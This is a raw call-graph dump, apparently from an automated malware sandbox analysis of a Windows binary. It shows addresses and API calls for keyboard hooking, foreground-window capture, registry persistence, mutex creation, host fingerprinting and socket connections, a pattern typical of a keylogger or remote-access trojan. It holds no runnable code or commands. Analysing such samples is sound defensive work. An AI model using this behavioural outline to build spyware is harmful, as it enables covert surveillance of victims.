52180 401d64 28 API calls 52177->52180 52656 43360d 22 API calls 3 library calls 52178->52656 52182 40deb1 52180->52182 52181 40de71 52183 401d64 28 API calls 52181->52183 52186 40def9 52182->52186 52187 40debd 52182->52187 52184 40de84 52183->52184 52185 40de8b CreateThread 52184->52185 52185->52177 53657 419128 112 API calls __EH_prolog 52185->53657 52189 401d64 28 API calls 52186->52189 52657 43360d 22 API calls 3 library calls 52187->52657 52190 40df02 52189->52190 52194 40df6c 52190->52194 52195 40df0e 52190->52195 52191 40dec6 52192 401d64 28 API calls 52191->52192 52193 40ded8 52192->52193 52198 40dedf CreateThread 52193->52198 52196 401d64 28 API calls 52194->52196 52197 401d64 28 API calls 52195->52197 52199 40df75 52196->52199 52200 40df1e 52197->52200 52198->52186 53656 419128 112 API calls __EH_prolog 52198->53656 52201 40df81 52199->52201 52202 40dfba 52199->52202 52203 401d64 28 API calls 52200->52203 52205 401d64 28 API calls 52201->52205 52463 41a7a2 GetComputerNameExW GetUserNameW 52202->52463 52206 40df33 52203->52206 52208 40df8a 52205->52208 52658 40c854 52206->52658 52213 401d64 28 API calls 52208->52213 52209 401e18 26 API calls 52210 40dfce 52209->52210 52212 401e13 26 API calls 52210->52212 52215 40dfd7 52212->52215 52216 40df9f 52213->52216 52218 40dfe0 SetProcessDEPPolicy 52215->52218 52219 40dfe3 CreateThread 52215->52219 52224 43a5e7 42 API calls 52216->52224 52217 401e18 26 API calls 52220 40df52 52217->52220 52218->52219 52222 40e004 52219->52222 52223 40dff8 CreateThread 52219->52223 53626 40e54f 52219->53626 52221 401e13 26 API calls 52220->52221 52225 40df5b CreateThread 52221->52225 52226 40e019 52222->52226 52227 40e00d CreateThread 52222->52227 52223->52222 53658 410f36 145 API calls 52223->53658 52228 40dfac 52224->52228 52225->52194 53653 40196b 49 API calls 52225->53653 52229 40e073 52226->52229 52231 401f66 28 API calls 52226->52231 52227->52226 53655 411524 38 API calls ___scrt_fastfail 52227->53655 52669 40b95c 7 API calls 52228->52669 52474 41246e RegOpenKeyExA 52229->52474 52232 40e046 52231->52232 52670 404c9e 28 API calls 52232->52670 52236 40e053 52238 401f66 28 API calls 52236->52238 52237 40e12a 52486 40cbac 52237->52486 52240 40e062 52238->52240 52239 41ae08 28 API calls 52242 40e0a4 52239->52242 52243 41a686 79 API calls 52240->52243 52477 412584 RegOpenKeyExW 52242->52477 52245 40e067 52243->52245 52247 401eea 26 API calls 52245->52247 52247->52229 52250 401e13 26 API calls 52253 40e0c5 52250->52253 52251 40e0ed DeleteFileW 52252 40e0f4 52251->52252 52251->52253 52254 41ae08 28 API calls 52252->52254 52253->52251 52253->52252 52255 40e0db Sleep 52253->52255 52256 40e104 52254->52256 52671 401e07 52255->52671 52482 41297a RegOpenKeyExW 52256->52482 52259 40e117 52260 401e13 26 API calls 52259->52260 52261 40e121 52260->52261 52262 401e13 26 API calls 52261->52262 52262->52237 52263->51950 52264->51954 52265->51953 52266->51963 52267->51965 52268->51968 52269->51943 52270->51946 52271->51949 52272->51972 52273->51974 52278 44e949 52274->52278 52277 437a17 8 API calls 3 library calls 52277->51979 52279 44e962 52278->52279 52282 433d2c 52279->52282 52281 4336da 52281->51977 52281->52277 52283 433d37 IsProcessorFeaturePresent 52282->52283 52284 433d35 52282->52284 52286 4341a4 52283->52286 52284->52281 52289 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 52286->52289 52288 434287 52288->52281 52289->52288 52291 433c71 GetStartupInfoW 52290->52291 52291->51983 52293 44dddb 52292->52293 52294 44ddd2 52292->52294 52293->51986 52297 44dcc8 51 API calls 5 library calls 52294->52297 52296->51986 52297->52293 52299 41bd22 LoadLibraryA GetProcAddress 52298->52299 52300 41bd12 GetModuleHandleA GetProcAddress 52298->52300 52301 41bd4b 32 API calls 52299->52301 52302 41bd3b LoadLibraryA GetProcAddress 52299->52302 52300->52299 52301->51991 52302->52301 52675 41a63f FindResourceA 52303->52675 52306 43a88c ___crtLCMapStringA 21 API calls 52307 40e192 ctype 52306->52307 52308 401f86 28 API calls 52307->52308 52309 40e1ad 52308->52309 52310 401eef 26 API calls 52309->52310 52311 40e1b8 52310->52311 52312 401eea 26 API calls 52311->52312 52313 40e1c1 52312->52313 52314 43a88c ___crtLCMapStringA 21 API calls 52313->52314 52315 40e1d2 ctype 52314->52315 52678 406052 52315->52678 52317 40e205 52317->51993 52320 41afd6 52318->52320 52319 401eea 26 API calls 52321 41b078 52319->52321 52323 41b048 52320->52323 52329 401eef 26 API calls 52320->52329 52334 401eea 26 API calls 52320->52334 52338 41b046 52320->52338 52681 403b60 52320->52681 52684 41bfa9 28 API calls 52320->52684 52322 401eea 26 API calls 52321->52322 52324 41b080 52322->52324 52325 403b60 28 API calls 52323->52325 52327 401eea 26 API calls 52324->52327 52328 41b054 52325->52328 52330 40d7c6 52327->52330 52331 401eef 26 API calls 52328->52331 52329->52320 52339 40e8bd 52330->52339 52332 41b05d 52331->52332 52333 401eea 26 API calls 52332->52333 52335 41b065 52333->52335 52334->52320 52685 41bfa9 28 API calls 52335->52685 52338->52319 52340 40e8ca 52339->52340 52342 40e8da 52340->52342 52702 40200a 26 API calls 52340->52702 52342->52001 52703 404bc4 52343->52703 52345 405cf4 52345->52018 52347 401efe 52346->52347 52349 401f0a 52347->52349 52707 4021b9 52347->52707 52349->52022 52352 401ec9 52350->52352 52351 401ee4 52351->52032 52352->52351 52353 402325 28 API calls 52352->52353 52353->52351 52711 401e8f 52354->52711 52356 40bee1 CreateMutexA GetLastError 52356->52048 52713 41b15b 52357->52713 52359 41a471 52717 412513 RegOpenKeyExA 52359->52717 52362 401eef 26 API calls 52363 41a49f 52362->52363 52364 401eea 26 API calls 52363->52364 52365 41a4a7 52364->52365 52366 41a4fa 52365->52366 52367 412513 31 API calls 52365->52367 52366->52054 52368 41a4cd 52367->52368 52369 41a4d8 StrToIntA 52368->52369 52370 41a4ef 52369->52370 52371 41a4e6 52369->52371 52373 401eea 26 API calls 52370->52373 52722 41c102 28 API calls 52371->52722 52373->52366 52375 40698f 52374->52375 52376 4124b7 3 API calls 52375->52376 52377 406996 52376->52377 52377->52064 52377->52065 52379 41ae1c 52378->52379 52723 40b027 52379->52723 52381 41ae24 52381->52079 52383 401e27 52382->52383 52385 401e33 52383->52385 52732 402121 26 API calls 52383->52732 52385->52082 52387 402121 52386->52387 52388 402150 52387->52388 52733 402718 26 API calls _Deallocate 52387->52733 52388->52085 52391 4128c0 52390->52391 52392 406052 28 API calls 52391->52392 52393 4128d5 52392->52393 52394 401fbd 28 API calls 52393->52394 52395 4128e5 52394->52395 52396 4126d2 29 API calls 52395->52396 52397 4128ef 52396->52397 52398 401eea 26 API calls 52397->52398 52399 4128fc 52398->52399 52399->52130 52401 401f6e 52400->52401 52734 402301 52401->52734 52405 412722 52404->52405 52407 4126eb 52404->52407 52406 401eea 26 API calls 52405->52406 52408 40dd3b 52406->52408 52409 4126fd RegSetValueExA RegCloseKey 52407->52409 52408->52132 52409->52405 52411 43a600 _swprintf 52410->52411 52738 43993e 52411->52738 52415 41a737 52414->52415 52416 41a69c GetLocalTime 52414->52416 52418 401eea 26 API calls 52415->52418 52417 404cbf 28 API calls 52416->52417 52419 41a6de 52417->52419 52420 41a73f 52418->52420 52421 405ce6 28 API calls 52419->52421 52422 401eea 26 API calls 52420->52422 52423 41a6ea 52421->52423 52424 40ddaa 52422->52424 52425 4027cb 28 API calls 52423->52425 52424->52156 52426 41a6f6 52425->52426 52427 405ce6 28 API calls 52426->52427 52428 41a702 52427->52428 52772 406478 76 API calls 52428->52772 52430 41a710 52431 401eea 26 API calls 52430->52431 52432 41a71c 52431->52432 52433 401eea 26 API calls 52432->52433 52434 41a725 52433->52434 52435 401eea 26 API calls 52434->52435 52436 41a72e 52435->52436 52437 401eea 26 API calls 52436->52437 52437->52415 52439 409536 _wcslen 52438->52439 52440 409541 52439->52440 52441 409558 52439->52441 52443 40c89e 32 API calls 52440->52443 52442 40c89e 32 API calls 52441->52442 52444 409560 52442->52444 52445 409549 52443->52445 52447 401e18 26 API calls 52444->52447 52446 401e18 26 API calls 52445->52446 52462 409553 52446->52462 52448 40956e 52447->52448 52449 401e13 26 API calls 52448->52449 52451 409576 52449->52451 52450 401e13 26 API calls 52452 4095ad 52450->52452 52788 40856b 28 API calls 52451->52788 52773 409837 52452->52773 52455 409588 52789 4028cf 52455->52789 52458 409593 52459 401e18 26 API calls 52458->52459 52460 40959d 52459->52460 52461 401e13 26 API calls 52460->52461 52461->52462 52462->52450 52957 403b40 52463->52957 52467 41a7fd 52468 4028cf 28 API calls 52467->52468 52469 41a807 52468->52469 52470 401e13 26 API calls 52469->52470 52471 41a810 52470->52471 52472 401e13 26 API calls 52471->52472 52473 40dfc3 52472->52473 52473->52209 52475 40e08b 52474->52475 52476 41248f RegQueryValueExA RegCloseKey 52474->52476 52475->52237 52475->52239 52476->52475 52478 4125b0 RegQueryValueExW RegCloseKey 52477->52478 52479 4125dd 52477->52479 52478->52479 52480 403b40 28 API calls 52479->52480 52481 40e0ba 52480->52481 52481->52250 52483 412992 RegDeleteValueW 52482->52483 52484 4129a6 52482->52484 52483->52484 52485 4129a2 52483->52485 52484->52259 52485->52259 52487 40cbc5 52486->52487 52488 41246e 3 API calls 52487->52488 52489 40cbcc 52488->52489 52490 40cbeb 52489->52490 52979 401602 52489->52979 52494 413fd4 52490->52494 52492 40cbd9 52982 4127d5 RegCreateKeyA 52492->52982 52495 413feb 52494->52495 52999 41aa73 52495->52999 52497 413ff6 52498 401d64 28 API calls 52497->52498 52499 41400f 52498->52499 52500 43a5e7 42 API calls 52499->52500 52501 41401c 52500->52501 52502 414021 Sleep 52501->52502 52503 41402e 52501->52503 52502->52503 52504 401f66 28 API calls 52503->52504 52505 41403d 52504->52505 52506 401d64 28 API calls 52505->52506 52507 41404b 52506->52507 52508 401fbd 28 API calls 52507->52508 52509 414053 52508->52509 52510 41afc3 28 API calls 52509->52510 52511 41405b 52510->52511 53003 404262 WSAStartup 52511->53003 52513 414065 52514 401d64 28 API calls 52513->52514 52515 41406e 52514->52515 52516 401d64 28 API calls 52515->52516 52568 4140ed 52515->52568 52517 414087 52516->52517 52518 401d64 28 API calls 52517->52518 52519 414098 52518->52519 52521 401d64 28 API calls 52519->52521 52520 41afc3 28 API calls 52520->52568 52522 4140a9 52521->52522 52524 401d64 28 API calls 52522->52524 52523 4085b4 28 API calls 52523->52568 52525 4140ba 52524->52525 52527 401d64 28 API calls 52525->52527 52526 401eef 26 API calls 52526->52568 52528 4140cb 52527->52528 52529 401d64 28 API calls 52528->52529 52530 4140dd 52529->52530 53134 404101 87 API calls 52530->53134 52532 405ce6 28 API calls 52532->52568 52533 401d64 28 API calls 52533->52568 52535 414244 WSAGetLastError 53135 41bc76 30 API calls 52535->53135 52540 401f66 28 API calls 52540->52568 52543 404cbf 28 API calls 52543->52568 52544 401d64 28 API calls 52546 414ae4 52544->52546 52545 401d8c 26 API calls 52545->52568 52546->52544 52547 43a5e7 42 API calls 52546->52547 53137 40a767 84 API calls 52546->53137 52548 414b80 Sleep 52547->52548 52548->52568 52549 41a686 79 API calls 52549->52568 52552 4082dc 28 API calls 52552->52568 52553 440c51 26 API calls 52553->52568 52554 401fbd 28 API calls 52554->52568 52555 41265d 3 API calls 52555->52568 52556 412513 31 API calls 52556->52568 52557 403b40 28 API calls 52557->52568 52560 41ad46 28 API calls 52560->52568 52561 401d64 28 API calls 52562 4144ed GetTickCount 52561->52562 52563 41ad46 28 API calls 52562->52563 52563->52568 52566 41aec8 28 API calls 52566->52568 52568->52520 52568->52523 52568->52526 52568->52532 52568->52533 52568->52535 52568->52540 52568->52543 52568->52545 52568->52546 52568->52549 52568->52552 52568->52553 52568->52554 52568->52555 52568->52556 52568->52557 52568->52560 52568->52561 52568->52566 52570 4027cb 28 API calls 52568->52570 52571 40275c 28 API calls 52568->52571 52572 404468 60 API calls 52568->52572 52573 401eea 26 API calls 52568->52573 52576 414b22 CreateThread 52568->52576 52577 401e13 26 API calls 52568->52577 53004 413f9a 52568->53004 53009 4041f1 52568->53009 53016 404915 52568->53016 53031 40428c connect 52568->53031 53091 41a96d 52568->53091 53094 413683 52568->53094 53097 40cbf1 52568->53097 53103 41adee 52568->53103 53106 41aca0 GetLastInputInfo GetTickCount 52568->53106 53107 41ac52 52568->53107 53112 40e679 GetLocaleInfoA 52568->53112 53115 4027ec 52568->53115 53119 4045d5 52568->53119 53136 404c9e 28 API calls 52568->53136 53138 4047eb WaitForSingleObject 52568->53138 52570->52568 52571->52568 52572->52568 52573->52568 52576->52568 53608 419e89 104 API calls 52576->53608 52577->52568 52578->52009 52579->52019 52582 4085c0 52581->52582 52583 402e78 28 API calls 52582->52583 52584 4085e4 52583->52584 52584->52040 52586 4124e1 RegQueryValueExA RegCloseKey 52585->52586 52587 41250b 52585->52587 52586->52587 52587->52036 52588->52043 52589->52072 52590->52065 52591->52056 52592->52070 52594 40c8ba 52593->52594 52595 40c8da 52594->52595 52596 40c90f 52594->52596 52597 40c8d0 52594->52597 53620 41a74b 29 API calls 52595->53620 52600 41b15b 2 API calls 52596->52600 52599 40ca03 GetLongPathNameW 52597->52599 52602 403b40 28 API calls 52599->52602 52603 40c914 52600->52603 52601 40c8e3 52606 401e18 26 API calls 52601->52606 52607 40ca18 52602->52607 52604 40c918 52603->52604 52605 40c96a 52603->52605 52609 403b40 28 API calls 52604->52609 52608 403b40 28 API calls 52605->52608 52645 40c8ed 52606->52645 52610 403b40 28 API calls 52607->52610 52611 40c978 52608->52611 52612 40c926 52609->52612 52613 40ca27 52610->52613 52618 403b40 28 API calls 52611->52618 52619 403b40 28 API calls 52612->52619 53609 40cc37 52613->53609 52615 401e13 26 API calls 52615->52597 52621 40c98e 52618->52621 52622 40c93c 52619->52622 52620 40ca45 52623 402860 28 API calls 52620->52623 52624 402860 28 API calls 52621->52624 52625 402860 28 API calls 52622->52625 52626 40ca4f 52623->52626 52627 40c999 52624->52627 52628 40c947 52625->52628 52629 401e13 26 API calls 52626->52629 52630 401e18 26 API calls 52627->52630 52631 401e18 26 API calls 52628->52631 52632 40ca59 52629->52632 52633 40c9a4 52630->52633 52634 40c952 52631->52634 52635 401e13 26 API calls 52632->52635 52636 401e13 26 API calls 52633->52636 52637 401e13 26 API calls 52634->52637 52638 40ca62 52635->52638 52639 40c9ad 52636->52639 52640 40c95b 52637->52640 52641 401e13 26 API calls 52638->52641 52642 401e13 26 API calls 52639->52642 52643 401e13 26 API calls 52640->52643 52644 40ca6b 52641->52644 52642->52645 52643->52645 52646 401e13 26 API calls 52644->52646 52645->52615 52647 40ca74 52646->52647 52648 401e13 26 API calls 52647->52648 52649 40ca7d 52648->52649 52649->52118 52650->52131 52651->52152 52653 412683 RegQueryValueExA RegCloseKey 52652->52653 52654 4126a7 52652->52654 52653->52654 52654->52111 52655->52146 52656->52181 52657->52191 52659 401f66 28 API calls 52658->52659 52660 40c86b 52659->52660 52661 41ae08 28 API calls 52660->52661 52662 40c876 52661->52662 52663 40c89e 32 API calls 52662->52663 52664 40c887 52663->52664 52665 401e13 26 API calls 52664->52665 52666 40c890 52665->52666 52667 401eea 26 API calls 52666->52667 52668 40c898 52667->52668 52668->52217 52669->52202 52670->52236 52672 401e0c 52671->52672 52673->52063 52676 40e183 52675->52676 52677 41a65c LoadResource LockResource SizeofResource 52675->52677 52676->52306 52677->52676 52679 401f86 28 API calls 52678->52679 52680 406066 52679->52680 52680->52317 52686 403c30 52681->52686 52684->52320 52685->52338 52687 403c39 52686->52687 52690 403c59 52687->52690 52691 403c68 52690->52691 52696 4032a4 52691->52696 52693 403c74 52694 402325 28 API calls 52693->52694 52695 403b73 52694->52695 52695->52320 52697 4032b0 52696->52697 52698 4032ad 52696->52698 52701 4032b6 28 API calls 52697->52701 52698->52693 52702->52342 52704 404bd0 52703->52704 52705 40245c 28 API calls 52704->52705 52706 404be4 52705->52706 52706->52345 52709 4021c6 52707->52709 52708 4021e8 52708->52349 52709->52708 52710 40262e 26 API calls 52709->52710 52710->52708 52712 401e94 52711->52712 52714 41b183 52713->52714 52715 41b168 GetCurrentProcess IsWow64Process 52713->52715 52714->52359 52715->52714 52716 41b17f 52715->52716 52716->52359 52718 412541 RegQueryValueExA RegCloseKey 52717->52718 52719 412569 52717->52719 52718->52719 52720 401f66 28 API calls 52719->52720 52721 41257e 52720->52721 52721->52362 52722->52370 52724 40b02f 52723->52724 52727 40b04b 52724->52727 52726 40b045 52726->52381 52728 40b055 52727->52728 52730 40b060 52728->52730 52731 40b138 28 API calls 52728->52731 52730->52726 52731->52730 52732->52385 52733->52388 52735 40230d 52734->52735 52736 402325 28 API calls 52735->52736 52737 401f80 52736->52737 52737->52124 52756 43a545 52738->52756 52740 43998b 52765 4392de 38 API calls 3 library calls 52740->52765 52742 439950 52742->52740 52743 439965 52742->52743 52755 40dd54 52742->52755 52763 445354 20 API calls _abort 52743->52763 52745 43996a 52764 43a827 26 API calls _Deallocate 52745->52764 52748 439997 52750 4399c6 52748->52750 52766 43a58a 42 API calls __Toupper 52748->52766 52749 439a32 52768 43a4f1 26 API calls 2 library calls 52749->52768 52750->52749 52767 43a4f1 26 API calls 2 library calls 52750->52767 52753 439af9 _swprintf 52753->52755 52769 445354 20 API calls _abort 52753->52769 52755->52138 52755->52143 52757 43a54a 52756->52757 52758 43a55d 52756->52758 52770 445354 20 API calls _abort 52757->52770 52758->52742 52760 43a54f 52771 43a827 26 API calls _Deallocate 52760->52771 52762 43a55a 52762->52742 52763->52745 52764->52755 52765->52748 52766->52748 52767->52749 52768->52753 52769->52755 52770->52760 52771->52762 52772->52430 52774 409855 52773->52774 52775 4124b7 3 API calls 52774->52775 52776 40985c 52775->52776 52777 409870 52776->52777 52778 40988a 52776->52778 52780 4095cf 52777->52780 52781 409875 52777->52781 52792 4082dc 52778->52792 52780->52175 52783 4082dc 28 API calls 52781->52783 52785 409883 52783->52785 52818 409959 29 API calls 52785->52818 52787 409888 52787->52780 52788->52455 52948 402d8b 52789->52948 52791 4028dd 52791->52458 52793 4082eb 52792->52793 52819 408431 52793->52819 52795 408309 52796 4098a5 52795->52796 52824 40affa 52796->52824 52799 4098f6 52801 401f66 28 API calls 52799->52801 52800 4098ce 52802 401f66 28 API calls 52800->52802 52803 409901 52801->52803 52804 4098d8 52802->52804 52805 401f66 28 API calls 52803->52805 52806 41ae08 28 API calls 52804->52806 52807 409910 52805->52807 52808 4098e6 52806->52808 52809 41a686 79 API calls 52807->52809 52828 40a876 31 API calls ___crtLCMapStringA 52808->52828 52812 409915 CreateThread 52809->52812 52811 4098ed 52813 401eea 26 API calls 52811->52813 52814 409930 CreateThread 52812->52814 52815 40993c CreateThread 52812->52815 52840 4099a9 52812->52840 52813->52799 52814->52815 52837 409993 52814->52837 52816 401e13 26 API calls 52815->52816 52834 4099b5 52815->52834 52817 409950 52816->52817 52817->52780 52818->52787 52947 40999f 136 API calls 52818->52947 52820 40843d 52819->52820 52822 40845b 52820->52822 52823 402f0d 28 API calls 52820->52823 52822->52795 52823->52822 52826 40b006 52824->52826 52825 4098c3 52825->52799 52825->52800 52826->52825 52829 403b9e 52826->52829 52828->52811 52830 403ba8 52829->52830 52832 403bb3 52830->52832 52833 403cfd 28 API calls 52830->52833 52832->52825 52833->52832 52843 40a3f4 52834->52843 52892 4099e4 52837->52892 52913 409e48 52840->52913 52849 40a402 52843->52849 52844 4099be 52845 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 52846 40b027 28 API calls 52845->52846 52846->52849 52849->52844 52849->52845 52850 41aca0 GetLastInputInfo GetTickCount 52849->52850 52852 40a4a2 GetWindowTextW 52849->52852 52854 401e13 26 API calls 52849->52854 52855 40a5ff 52849->52855 52856 40affa 28 API calls 52849->52856 52858 40a569 Sleep 52849->52858 52861 401f66 28 API calls 52849->52861 52865 405ce6 28 API calls 52849->52865 52867 4028cf 28 API calls 52849->52867 52868 40a4f1 52849->52868 52869 41ae08 28 API calls 52849->52869 52870 409d58 27 API calls 52849->52870 52871 401eea 26 API calls 52849->52871 52872 433519 5 API calls __Init_thread_wait 52849->52872 52873 4338a5 29 API calls __onexit 52849->52873 52874 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 52849->52874 52875 4082a8 28 API calls 52849->52875 52877 40b0dd 28 API calls 52849->52877 52878 40ae58 44 API calls 2 library calls 52849->52878 52879 440c51 52849->52879 52883 404c9e 28 API calls 52849->52883 52850->52849 52852->52849 52854->52849 52857 401e13 26 API calls 52855->52857 52856->52849 52857->52844 52858->52849 52861->52849 52862 4082dc 28 API calls 52862->52868 52865->52849 52867->52849 52868->52849 52868->52862 52876 40a876 31 API calls ___crtLCMapStringA 52868->52876 52869->52849 52870->52849 52871->52849 52872->52849 52873->52849 52874->52849 52875->52849 52876->52868 52877->52849 52878->52849 52880 440c5d 52879->52880 52884 440a4d 52880->52884 52883->52849 52885 440a64 52884->52885 52888 440aa5 52885->52888 52890 445354 20 API calls _abort 52885->52890 52887 440a9b 52891 43a827 26 API calls _Deallocate 52887->52891 52888->52849 52890->52887 52891->52888 52893 409a63 GetMessageA 52892->52893 52894 4099ff GetModuleHandleA SetWindowsHookExA 52892->52894 52895 409a75 TranslateMessage DispatchMessageA 52893->52895 52906 40999c 52893->52906 52894->52893 52896 409a1b GetLastError 52894->52896 52895->52893 52895->52906 52907 41ad46 52896->52907 52900 409a3e 52901 401f66 28 API calls 52900->52901 52902 409a4d 52901->52902 52903 41a686 79 API calls 52902->52903 52904 409a52 52903->52904 52905 401eea 26 API calls 52904->52905 52905->52906 52908 440c51 26 API calls 52907->52908 52909 41ad67 52908->52909 52910 401f66 28 API calls 52909->52910 52911 409a31 52910->52911 52912 404c9e 28 API calls 52911->52912 52912->52900 52914 409e5d Sleep 52913->52914 52933 409d97 52914->52933 52916 4099b2 52917 409e9d CreateDirectoryW 52921 409e6f 52917->52921 52918 409eae GetFileAttributesW 52918->52921 52919 409ec5 SetFileAttributesW 52919->52921 52920 41b58f 4 API calls 52920->52921 52921->52914 52921->52916 52921->52917 52921->52918 52921->52919 52921->52920 52923 401d64 28 API calls 52921->52923 52931 409f10 52921->52931 52922 409f3f PathFileExistsW 52922->52931 52923->52921 52924 41b61a 32 API calls 52924->52931 52925 401f86 28 API calls 52925->52931 52926 40a048 SetFileAttributesW 52926->52921 52927 401eea 26 API calls 52927->52931 52928 406052 28 API calls 52928->52931 52929 401eef 26 API calls 52929->52931 52930 41b687 4 API calls 52930->52931 52931->52922 52931->52924 52931->52925 52931->52926 52931->52927 52931->52928 52931->52929 52931->52930 52932 401eea 26 API calls 52931->52932 52932->52921 52934 409e44 52933->52934 52936 409dad 52933->52936 52934->52921 52935 409dcc CreateFileW 52935->52936 52937 409dda GetFileSize 52935->52937 52936->52935 52938 409e0f CloseHandle 52936->52938 52939 409e21 52936->52939 52940 409e04 Sleep 52936->52940 52941 409dfd 52936->52941 52937->52936 52937->52938 52938->52936 52939->52934 52943 4082dc 28 API calls 52939->52943 52940->52938 52946 40a7f0 83 API calls 52941->52946 52944 409e3d 52943->52944 52945 4098a5 127 API calls 52944->52945 52945->52934 52946->52940 52949 402d97 52948->52949 52952 4030f7 52949->52952 52951 402dab 52951->52791 52953 403101 52952->52953 52955 403115 52953->52955 52956 4036c2 28 API calls 52953->52956 52955->52951 52956->52955 52958 403b48 52957->52958 52964 403b7a 52958->52964 52961 403cbb 52968 403dc2 52961->52968 52963 403cc9 52963->52467 52965 403b86 52964->52965 52966 403b9e 28 API calls 52965->52966 52967 403b5a 52966->52967 52967->52961 52969 403dce 52968->52969 52972 402ffd 52969->52972 52971 403de3 52971->52963 52973 40300e 52972->52973 52974 4032a4 28 API calls 52973->52974 52975 40301a 52974->52975 52977 40302e 52975->52977 52978 4035e8 28 API calls 52975->52978 52977->52971 52978->52977 52985 4395ba 52979->52985 52983 4127ed RegSetValueExA RegCloseKey 52982->52983 52984 412814 52982->52984 52983->52984 52984->52490 52988 43953b 52985->52988 52987 401608 52987->52492 52989 43954a 52988->52989 52991 43955e 52988->52991 52996 445354 20 API calls _abort 52989->52996 52995 43955a __alldvrm 52991->52995 52998 447601 11 API calls 2 library calls 52991->52998 52992 43954f 52997 43a827 26 API calls _Deallocate 52992->52997 52995->52987 52996->52992 52997->52995 52998->52995 53000 41aab9 ctype ___scrt_fastfail 52999->53000 53001 401f66 28 API calls 53000->53001 53002 41ab2e 53001->53002 53002->52497 53003->52513 53005 413fb3 getaddrinfo WSASetLastError 53004->53005 53006 413fa9 53004->53006 53005->52568 53151 413e37 35 API calls ___std_exception_copy 53006->53151 53008 413fae 53008->53005 53010 404206 socket 53009->53010 53011 4041fd 53009->53011 53013 404220 53010->53013 53014 404224 CreateEventW 53010->53014 53152 404262 WSAStartup 53011->53152 53013->52568 53014->52568 53015 404202 53015->53010 53015->53013 53017 4049b1 53016->53017 53019 40492a 53016->53019 53017->52568 53018 404933 53020 404987 CreateEventA CreateThread 53018->53020 53019->53018 53019->53020 53021 404942 GetLocalTime 53019->53021 53020->53017 53154 404b1d 53020->53154 53022 41ad46 28 API calls 53021->53022 53023 40495b 53022->53023 53153 404c9e 28 API calls 53023->53153 53025 404968 53026 401f66 28 API calls 53025->53026 53027 404977 53026->53027 53028 41a686 79 API calls 53027->53028 53029 40497c 53028->53029 53030 401eea 26 API calls 53029->53030 53030->53020 53032 4043e1 53031->53032 53033 4042b3 53031->53033 53034 404343 53032->53034 53035 4043e7 WSAGetLastError 53032->53035 53033->53034 53037 404cbf 28 API calls 53033->53037 53057 4042e8 53033->53057 53034->52568 53035->53034 53036 4043f7 53035->53036 53038 4042f7 53036->53038 53039 4043fc 53036->53039 53041 4042d4 53037->53041 53044 401f66 28 API calls 53038->53044 53163 41bc76 30 API calls 53039->53163 53045 401f66 28 API calls 53041->53045 53043 4042f0 53043->53038 53047 404306 53043->53047 53048 404448 53044->53048 53049 4042e3 53045->53049 53046 40440b 53164 404c9e 28 API calls 53046->53164 53054 404315 53047->53054 53055 40434c 53047->53055 53051 401f66 28 API calls 53048->53051 53052 41a686 79 API calls 53049->53052 53056 404457 53051->53056 53052->53057 53053 404418 53058 401f66 28 API calls 53053->53058 53059 401f66 28 API calls 53054->53059 53160 420f34 56 API calls 53055->53160 53060 41a686 79 API calls 53056->53060 53158 420151 27 API calls 53057->53158 53062 404427 53058->53062 53063 404324 53059->53063 53060->53034 53065 41a686 79 API calls 53062->53065 53066 401f66 28 API calls 53063->53066 53064 404354 53067 404389 53064->53067 53068 404359 53064->53068 53069 40442c 53065->53069 53070 404333 53066->53070 53162 4202ea 28 API calls 53067->53162 53072 401f66 28 API calls 53068->53072 53073 401eea 26 API calls 53069->53073 53074 41a686 79 API calls 53070->53074 53076 404368 53072->53076 53073->53034 53078 404338 53074->53078 53075 404391 53079 4043be CreateEventW CreateEventW 53075->53079 53081 401f66 28 API calls 53075->53081 53077 401f66 28 API calls 53076->53077 53080 404377 53077->53080 53159 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53078->53159 53079->53034 53082 41a686 79 API calls 53080->53082 53084 4043a7 53081->53084 53085 40437c 53082->53085 53086 401f66 28 API calls 53084->53086 53161 420592 54 API calls 53085->53161 53088 4043b6 53086->53088 53089 41a686 79 API calls 53088->53089 53090 4043bb 53089->53090 53090->53079 53165 41a945 GlobalMemoryStatusEx 53091->53165 53093 41a982 53093->52568 53166 413646 53094->53166 53098 40cc0d 53097->53098 53099 41246e 3 API calls 53098->53099 53100 40cc14 53099->53100 53101 4124b7 3 API calls 53100->53101 53102 40cc2c 53100->53102 53101->53102 53102->52568 53104 401f86 28 API calls 53103->53104 53105 41ae03 53104->53105 53105->52568 53106->52568 53108 436050 ___scrt_fastfail 53107->53108 53109 41ac71 GetForegroundWindow GetWindowTextW 53108->53109 53110 403b40 28 API calls 53109->53110 53111 41ac9b 53110->53111 53111->52568 53113 401f66 28 API calls 53112->53113 53114 40e69e 53113->53114 53114->52568 53116 4027f8 53115->53116 53117 402e78 28 API calls 53116->53117 53118 402814 53117->53118 53118->52568 53120 4045ec 53119->53120 53121 43a88c ___crtLCMapStringA 21 API calls 53120->53121 53123 401f86 28 API calls 53120->53123 53124 401eef 26 API calls 53120->53124 53125 404666 53120->53125 53127 401eea 26 API calls 53120->53127 53199 40455b 53120->53199 53205 404688 53120->53205 53121->53120 53123->53120 53124->53120 53126 4047eb 98 API calls 53125->53126 53128 40466d 53126->53128 53127->53120 53129 401eea 26 API calls 53128->53129 53130 404676 53129->53130 53131 401eea 26 API calls 53130->53131 53132 40467f 53131->53132 53132->52568 53134->52568 53135->52568 53136->52568 53137->52568 53139 404805 SetEvent CloseHandle 53138->53139 53140 40481c closesocket 53138->53140 53141 40489c 53139->53141 53142 404829 53140->53142 53141->52568 53143 40483f 53142->53143 53605 404ab1 83 API calls 53142->53605 53145 404851 WaitForSingleObject 53143->53145 53146 404892 SetEvent CloseHandle 53143->53146 53606 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53145->53606 53146->53141 53148 404860 SetEvent WaitForSingleObject 53607 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53148->53607 53150 404878 SetEvent CloseHandle CloseHandle 53150->53146 53151->53008 53152->53015 53153->53025 53157 404b29 101 API calls 53154->53157 53156 404b26 53157->53156 53158->53043 53159->53034 53160->53064 53161->53078 53162->53075 53163->53046 53164->53053 53165->53093 53169 413619 53166->53169 53170 41362e ___scrt_initialize_default_local_stdio_options 53169->53170 53173 43e2dd 53170->53173 53176 43b030 53173->53176 53177 43b070 53176->53177 53178 43b058 53176->53178 53177->53178 53179 43b078 53177->53179 53193 445354 20 API calls _abort 53178->53193 